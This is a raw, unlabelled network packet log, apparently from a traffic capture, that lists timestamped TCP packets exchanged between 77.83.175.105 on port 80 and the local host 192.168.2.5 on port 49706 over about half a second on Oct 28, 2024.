                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.980173111 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.980201006 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.980226994 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.981215000 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.981226921 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.981235981 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.981267929 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.981297016 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.982240915 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.982251883 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.982292891 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.982326031 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.983081102 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.983092070 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:05.983127117 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.014261961 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.014324903 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.014553070 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.014563084 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.014604092 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.015419006 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.015429020 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.015474081 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.016221046 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.016230106 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.016239882 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.016264915 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.016297102 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.017453909 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.017503977 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.025721073 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.025883913 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.025932074 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.025942087 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.025993109 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.026896954 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.026906967 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.026947975 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.027918100 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.027928114 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.027961969 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.028548956 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.028558969 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.028589010 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.028615952 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.029552937 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.029565096 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.029586077 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.029613972 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.092210054 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.092288017 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.092432022 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.092441082 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.092475891 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.093342066 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.093352079 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.093400955 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.094221115 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.094290018 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.094628096 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.094639063 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.094687939 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.095654964 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.095666885 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.095715046 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.096693993 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.096705914 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.096726894 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.096755981 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.097704887 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.097716093 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.097724915 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.097770929 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.097770929 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.098716021 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.098727942 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.098752022 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.098779917 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.099709034 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.099720001 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.099728107 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.099754095 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.099781990 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.131656885 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.131721973 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.132195950 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.132206917 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.132246971 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.132246971 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.132766962 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.132778883 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.132811069 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.133555889 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.133567095 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.133603096 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.134547949 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.134596109 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.142936945 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.142982006 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.143192053 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.143203020 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.143232107 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.143259048 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.144068956 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.144112110 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.144299030 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.144308090 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.144335032 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.144362926 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.144862890 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.144872904 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.144906998 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.145859957 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.145870924 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.145891905 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.145920038 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.146923065 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.146934986 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.146969080 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.147001028 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.147907972 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.147917986 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.147969961 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.210232019 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.210283995 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.210288048 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.210299015 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.210318089 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.210345030 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.210911989 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.210922003 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.210971117 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.212265968 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.212277889 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.212332010 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.212953091 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.212963104 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.213006973 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.213898897 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.213910103 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.213952065 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.214925051 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.214936018 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.214973927 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.215004921 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.215809107 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.215821981 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.215830088 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.215848923 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.215883017 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.216747999 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.216761112 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.216792107 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.216823101 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.217741966 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.217753887 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.217762947 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.217777014 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.217804909 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.248823881 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.248902082 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.249033928 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.249042988 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.249190092 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.249190092 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.249514103 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.249530077 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.249567032 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.249618053 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.250504017 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.250514984 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.250569105 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.250570059 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.251137972 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.251149893 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.251188993 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.251929045 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.251971006 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.260114908 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.260173082 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.260339975 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.260349989 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.260392904 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.261240959 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.261250019 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.261296034 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.261909962 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.261920929 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.261960030 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.261976957 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.262773037 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.262784004 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.262819052 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.262834072 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.263848066 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.263858080 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.264002085 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.264681101 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.264693022 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.264698029 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.264776945 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.333997965 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.334074020 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.334619999 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.334630966 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.334683895 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.335549116 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.335558891 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.335597038 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.336071968 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.336082935 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.336127996 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.336977959 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.336988926 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.337029934 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.338093996 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.338104963 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.338138103 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.338165998 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.338969946 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.338982105 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.339027882 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.339701891 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.339713097 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.339721918 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.339737892 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.339766026 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.340964079 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.340975046 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.341012001 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.341500044 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.341510057 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.341548920 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.341595888 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.366489887 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.366544008 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.366585970 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.366595984 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.366626024 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.366652966 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.367225885 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.367234945 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.367269993 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.367925882 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.367934942 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.367974997 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.368582964 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.368635893 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.377554893 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.377624989 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.377660036 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.377667904 CET804970677.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.377691984 CET4970680192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:06.377737045 CET4970680192.168.2.577.83.175.105
